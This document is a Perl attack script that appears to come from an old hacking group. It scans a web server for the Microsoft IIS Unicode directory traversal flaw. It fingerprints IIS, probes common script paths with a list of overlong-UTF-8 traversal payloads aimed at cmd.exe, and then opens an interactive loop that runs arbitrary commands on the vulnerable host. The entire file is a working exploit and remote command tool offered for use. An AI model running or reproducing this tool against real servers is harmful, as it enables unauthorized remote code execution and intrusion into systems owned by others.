#!/usr/bin/perl -w

# Unicode Scanner by backslash of WoH
# edited from b-r00t's unicode-shell.pl
# always scan port 80 

use strict;
use IO::Socket;

my $host;               
my $port=80;               
my $command;            
my $url;          
my $path="";     
my $hello="winnt/system32/cmd.exe?/c+"; 
my @results;            
my $probe;              
my @U;                 
my $backslash="";
my @list=("/","/msadc/","/scripts/","/wwwroot/","/cgi-bin/","/_vti_bin/","/_vti_adm/","/_vti_aut/","/_vti_cnf/","/iisadminpwd/");

$U[1] = "..%c0%af../";
$U[2] = "..%c1%9c../";
$U[3] = "..%c1%pc../";
$U[4] = "..%c0%9v../";
$U[5] = "..%c0%qf../";
$U[6] = "..%c1%8s../";
$U[7] = "..%c1%1c../";
$U[8] = "..%c1%9c../";
$U[9] = "..%c1%af../";
$U[10] = "..%e0%80%af../";
$U[11] = "..%f0%80%80%af../";
$U[12] = "..%f8%80%80%80%af../";
$U[13] = "..%fc%80%80%80%80%af../";
$U[14] = "..%c1%9c..%c1%9c..%c1%9c../";
$U[15] = "..%c0%af../..%c0%af../..%c0%af../";
$U[16] = "..%C0%AF../..%C0%AF../..%C0%AF../";
$U[16] = "..%e0%80%af../..%e0%80%af../..%e0%80%af../";
$U[17] = "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../";
$U[18] = "..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../";

&title;
&slash0r;

sub slash0r{
        &host;
        &server;
        &scan;
};

sub host 
{
        print "\nHost : ";
        chomp($host=<STDIN>);
};

sub server 
{
        print "\nTrying to obtain IIS Server string ...\n";
        $probe = "string";
        my $output;
        my $webserver = "something";
        &connect;
        foreach $output (@results)
        {
                if ($output =~/IIS/)
                { 
                        $webserver = "iis" 
                };
        };
        if ($webserver ne "iis")
        {
               print "\a\a\n\n";
                print "\nThis Server may not be running Micro\$oft IIS WebServer";
                print "\nDo You Wish To Cont ... [Y/N]";
                my $choice = <STDIN>;
                chomp $choice;
                if ($choice =~/N/i) {&exit};
        }
        else{print "\nOK ... It Seems To Be Micro\$hit IIS.";};
};  

sub scan 
{
        my $status = "not_vulnerable";
        print "\nScanning Webserver $host on port $port ...";
        my $loop;
        my $output;
        my $flag;
        my $slash;
        $command="dir";
        foreach $slash (@list)
        {
		print "\npath : $slash";
		print "\nvulnerable on url no : ";
                for ($loop=1; $loop < @U; $loop++) 
                { 
                        $flag = "0";
                        $backslash = ($slash.$U[$loop].$hello);
                        $probe = "scan";
                        &connect;
                        foreach $output (@results)
                        {
                                if ($output =~ /Directory/) 
                                {
                                      $flag = "1";
                                      $status = "vulnerable";
                                };
                        };
          
                        if ($flag eq "0") 
                        {    
                         }
                        else
                        {
                                print "\n$loop. $host$slash$U[$loop]$hello\a";
                        };
                };
        };
        if ($status eq "not_vulnerable"){
                                        print "\n\n$host not vulnerable.\n\n\a\a";
					&slash0r;
	                                      }
	else{
		print "\a\n";
        	&command;
		&choose;
	};
}; 

sub choose {
        print "\nURL To Use [0 = Other] : ";
	my $choice=<STDIN>;
        chomp $choice;
        if ($choice > @U){ &choose; };
        if ($choice =~/\D/g ){ &choose; };
        if ($choice == 0){ &other; };
	if ($choice != 0){
	$url = ($U[$choice].$hello);
 	&path;}
}; 

sub path {
	$path="";
	print "\n ##################### \n";
	print " PATH DESCRIPTION :\n";
	print " 0. /_vti_cnf/\n";
	print " 1. /msadc/\n";
	print " 2. /scripts/\n";
	print " 3. /wwwroot/\n";
	print " 4. /cgi-bin/\n";
	print " 5. /_vti_bin/\n";
	print " 6. /_vti_adm/\n";
	print " 7. /_vti_aut/\n";
	print " 8. /_vti_cnf/\n";
	print " 9. /iisadminpwd/\n";
	print " ##################### \n";

	print "\nPATH To Use [10 = Other] : ";
        my $ch0ice=<STDIN>;
        chomp $ch0ice;
	if ($ch0ice > @list){ &path; };
	if ($ch0ice =~/\D/g ){ &path; };
	if ($ch0ice == 10){ &other };
	$path = $list[$ch0ice];
	if ($ch0ice != 10){
		$backslash=($path.$url);};
	print "HTTP://$host$backslash";	
}

sub other {
        print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/c+"; 
        print "\nHTTP://$host";
        my $other = <STDIN>;
        chomp $other;
        $backslash = $other;
};

sub command {
        while ($command !~/quit/i) {
                print "\nHELP QUIT SCAN URL Or Command eg dir C: ";
                print "\nCommand : ";
                $command = <STDIN>;
                chomp $command;
                if ($command =~/quit/i) { &exit };
                if ($command =~/url/i) { &choose }; 
                if ($command =~/scan/i) { &slash0r };
                $command =~ s/\s/+/g; # remove white space.
		if ($command =~/quit|url|scan/i){}else{
                print "\nHTTP://$host$backslash$command";};
                $probe = "command";
                if ($command !~/quit|url|scan/) {&connect};
        };
        &exit;
};

sub connect 
{
        my $connection = IO::Socket::INET->new (
                                        Proto => "tcp",
                                        PeerAddr => "$host",
                                        PeerPort => "$port",
                                        ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
        $connection -> autoflush(1);
        if ($probe =~/command|scan/)
        {
                print $connection "GET $backslash$command HTTP/1.0\r\n\r\n";
        }
        elsif ($probe =~/string/) 
        {
                print $connection "HEAD / HTTP/1.0\r\n\r\n";
        };

        while ( <$connection> ) 
        { 
                @results = <$connection>;
        };
        close $connection;
        if ($probe eq "command")
        { 
                &output 
        };
        if ($probe eq "string")
        { 
                &output 
        };
};  


sub output
{
        print "\nOUTPUT FROM $host.\n";
        my $display;
        foreach $display (@results)
        {
            print "$display";
            sleep 1;
        };
};

sub title{
        print "\nunicode scan0r by backslash";
        print "\nedited from b-r00t's unicode-shell";
        print "\n";
}; 

sub exit{
	die "\a\n";
};